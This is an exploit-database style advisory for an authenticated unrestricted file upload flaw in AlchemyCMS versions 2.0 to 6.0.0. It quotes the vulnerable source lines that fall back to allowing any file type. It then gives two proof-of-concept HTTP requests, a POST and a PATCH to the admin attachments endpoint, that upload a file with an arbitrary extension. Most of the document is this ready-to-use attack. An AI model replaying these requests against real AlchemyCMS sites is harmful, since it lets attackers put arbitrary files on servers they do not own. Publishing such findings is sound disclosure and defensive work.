# Exploit Title: AlchemyCMS 2.x to 6.0.0 - Unrestricted File Upload (authenticated)
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://alchemy-cms.com
# Software Link: https://github.com/AlchemyCMS/alchemy_cms
# Version: from 2.0 to 6.0.0
# Tested on: Linux ruby 2.6.8p205 rails 6
in /app/models/alchemy/attachment.rb line 82 :
def allowed_filetypes
Config.get(:uploader).fetch("allowed_filetypes", {}).fetch("alchemy/attachments", [])
end
end
in /app/views/alchemy/admin/uploader/_button.html.erb in 18
configuration(:uploader)['allowed_filetypes'][object.class.model_name.collection] || ['*'] %>
POC :
POST /admin/attachments HTTP/1.1
------WebKitFormBoundarydAup7dA7ub3Weccp
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
Content-Type: application/octet-stream
anything
------WebKitFormBoundarydAup7dA7ub3Weccp--
OR
id = 8 for old attachment
PATCH /admin/attachments/8 HTTP/1.1
------WebKitFormBoundarylYnqNR9sxMPdw7Si
Content-Disposition: form-data; name="_method"
patch
------WebKitFormBoundarylYnqNR9sxMPdw7Si
Content-Disposition: form-data; name="attachment[file]"; filename="anyfile.anyext"
Content-Type: application/octet-stream
anything
------WebKitFormBoundarylYnqNR9sxMPdw7Si--